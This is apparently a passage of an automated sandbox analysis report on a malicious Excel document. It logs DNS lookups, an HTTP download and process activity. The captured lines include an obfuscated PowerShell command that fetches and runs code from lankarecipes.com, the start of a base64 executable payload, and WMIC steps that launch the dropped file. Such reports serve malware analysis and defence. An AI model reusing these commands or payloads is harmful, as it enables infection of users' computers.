                                                                                                                                                      Jan 8, 2021 09:39:54.444657087 CET53495638.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:54.671363115 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:54.753156900 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:55.658474922 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:55.714569092 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:56.677800894 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:56.733927965 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:58.110378981 CET5934953192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:58.168972015 CET53593498.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:58.674232960 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:58.722148895 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:59.276077032 CET5708453192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:59.326185942 CET53570848.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:00.566582918 CET5882353192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:00.622672081 CET53588238.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:01.560962915 CET5756853192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:01.609003067 CET53575688.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:02.689992905 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:02.759257078 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:03.782341957 CET5054053192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:03.833195925 CET53505408.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:07.308516979 CET5436653192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:07.356626987 CET53543668.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:11.355046034 CET5303453192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:11.426053047 CET53530348.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:14.180423975 CET5872253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:14.180705070 CET5659653192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:14.183274031 CET6410153192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:14.228439093 CET53565968.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:14.230950117 CET53641018.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:14.231075048 CET53587228.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:23.060261011 CET5776253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:23.108124971 CET53577628.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:24.589523077 CET5543553192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:24.778623104 CET53554358.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:31.270092010 CET5071353192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:31.320974112 CET53507138.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:36.791923046 CET5613253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:40:36.852351904 CET53561328.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:08.342684031 CET5898753192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:41:08.400568962 CET53589878.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:10.534939051 CET5657953192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:41:10.599462032 CET53565798.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:41:38.239742994 CET6063353192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:41:38.287874937 CET53606338.8.8.8192.168.2.3

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Jan 8, 2021 09:40:24.589523077 CET192.168.2.38.8.8.80x3d62Standard query (0)lankarecipes.comA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Jan 8, 2021 09:40:24.778623104 CET8.8.8.8192.168.2.30x3d62No error (0)lankarecipes.com192.185.236.165A (IP address)IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • lankarecipes.com

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.349731192.185.236.16580C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Jan 8, 2021 09:40:25.081321955 CET1269OUTGET /Sparc.jpg HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                      Host: lankarecipes.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Jan 8, 2021 09:40:25.271898031 CET1270INHTTP/1.1 200 OK
                                                                                                                                                      Date: Fri, 08 Jan 2021 08:40:25 GMT
                                                                                                                                                      Server: Apache
                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                      Connection: Upgrade, Keep-Alive
                                                                                                                                                      Last-Modified: Wed, 06 Jan 2021 16:45:57 GMT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 2326467
                                                                                                                                                      Keep-Alive: timeout=5, max=75
                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                      Data Raw: 20 53 45 74 2d 45 78 45 63 55 74 69 4f 6e 50 4f 6c 49 63 59 20 62 59 70 61 73 53 20 2d 73 43 6f 50 65 20 70 52 4f 43 45 53 73 20 2d 46 4f 72 63 45 20 3b 20 24 6b 76 45 53 6e 65 75 6d 54 62 72 74 20 3d 20 27 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 30 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 41 33 59 73 54 61 63 77 4f 71 69 58 4d 44 71 6f 6c 7a 41 36 71 4a 38 42 2b 6b 69 58 49 44 71 6f 6c 46 4a 61 65 4a 63 67 4f 71 69 54 77 68 6f 34 6c 32 41 36 71 4a 63 77 4f 71 69 58 45 44 71 6f 6c 53 61 57 4e 6f 63 77 4f 71 69 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 46 42 46 41 41 42 4d 41 51 55 41 74 75 6a 31 58 77 41 41 41 41 41 41 41 41 41 41 34 41 41 4f 41 51 73 42 42 67 41 41 63 42 6b 41 41 46 41 41 41 41 41 41 41 41 41 63 45 67 41 41 41 42 41 41 41 41 43 41 47 51 41 41 41 45 41 41 41 42 41 41 41 41 41 51 41 41 41 45 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 4f 41 5a 41 41 41 51 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 51 41 41 41 51 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 54 49 4d 5a 41 46 41 41 41 41 41 41 73 42 6b 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 42 6b 41 2f 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 47 51 42 30 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4c 6e 52 6c 65 48 51 41 41 41 42 45 59 42 6b 41 41 42 41 41 41 41 42 77 47 51 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 59 43 35 79 5a 47 46 30 59 51 41 41 2f 41 6b 41 41 41 43 41 47 51 41 41 45 41 41 41 41 49 41 5a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 45 41 75 5a 47 46 30 59 51 41 41 41 45 67 56 41 41 41 41 6b 42 6b 41 41 42 41 41 41 41 43 51 47 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 44 41 4c 6e 4a 7a 63 6d 4d 41 41 41 41 51 41 41 41 41 41 4c 41 5a 41 41 41 51 41 41 41 41 6f 42 6b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 43 35 79 5a 57 78 76 59 77 41 41 61 68 6b 41 41 41 44 41 47 51 41 41 49 41 41 41 41 4c 41 5a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 45 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                      Data Ascii: SEt-ExEcUtiOnPOlIcY bYpasS -sCoPe pROCESs -FOrcE ; $kvESneumTbrt = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA3YsTacwOqiXMDqolzA6qJ8B+kiXIDqolFJaeJcgOqiTwho4l2A6qJcwOqiXEDqolSaWNocwOqiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQUAtuj1XwAAAAAAAAAA4AAOAQsBBgAAcBkAAFAAAAAAAAAcEgAAABAAAACAGQAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAOAZAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAATIMZAFAAAAAAsBkAEAAAAAAAAAAAAAAAAAAAAAAAAAAAwBkA/AgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAGQB0AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABEYBkAABAAAABwGQAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA/AkAAACAGQAAEAAAAIAZAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAEgVAAAAkBkAABAAAACQGQAAAAAAAAAAAAAAAABAAADALnJzcmMAAAAQAAAAALAZAAAQAAAAoBkAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAAahkAAADAGQAAIAAAALAZAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      Analysis Process: EXCEL.EXE PID: 6560 Parent PID: 792

                                                                                                                                                      General

                                                                                                                                                      Start time:09:39:52
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x11a0000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: cmd.exe PID: 6884 Parent PID: 6560

                                                                                                                                                      General

                                                                                                                                                      Start time:09:39:56
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
                                                                                                                                                      Imagebase:0xbd0000
                                                                                                                                                      File size:232960 bytes
                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: conhost.exe PID: 6896 Parent PID: 6884

                                                                                                                                                      General

                                                                                                                                                      Start time:09:39:57
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff6b2800000
                                                                                                                                                      File size:625664 bytes
                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: powershell.exe PID: 6940 Parent PID: 6884

                                                                                                                                                      General

                                                                                                                                                      Start time:09:39:57
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
                                                                                                                                                      Imagebase:0x1270000
                                                                                                                                                      File size:430592 bytes
                                                                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: csc.exe PID: 3868 Parent PID: 6940

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:36
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
                                                                                                                                                      Imagebase:0xa30000
                                                                                                                                                      File size:2170976 bytes
                                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Analysis Process: cvtres.exe PID: 3596 Parent PID: 3868

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:40
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'
                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                      File size:43176 bytes
                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Analysis Process: cmd.exe PID: 3144 Parent PID: 6940

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:44
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
                                                                                                                                                      Imagebase:0xbd0000
                                                                                                                                                      File size:232960 bytes
                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: cmd.exe PID: 6588 Parent PID: 6940

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:44
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg
                                                                                                                                                      Imagebase:0xbd0000
                                                                                                                                                      File size:232960 bytes
                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: WMIC.exe PID: 1636 Parent PID: 6588

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:45
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                      Imagebase:0xfe0000
                                                                                                                                                      File size:391680 bytes
                                                                                                                                                      MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Analysis Process: Test3.jpg PID: 4928 Parent PID: 4940

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:46
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:1744221 bytes
                                                                                                                                                      MD5 hash:19387B30D6DBE83E31D3CAC884280D93
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:Visual Basic
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      Reputation:low

                                                                                                                                                      Analysis Process: Test3.jpg PID: 3180 Parent PID: 4928

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:54
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:1744221 bytes
                                                                                                                                                      MD5 hash:19387B30D6DBE83E31D3CAC884280D93
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >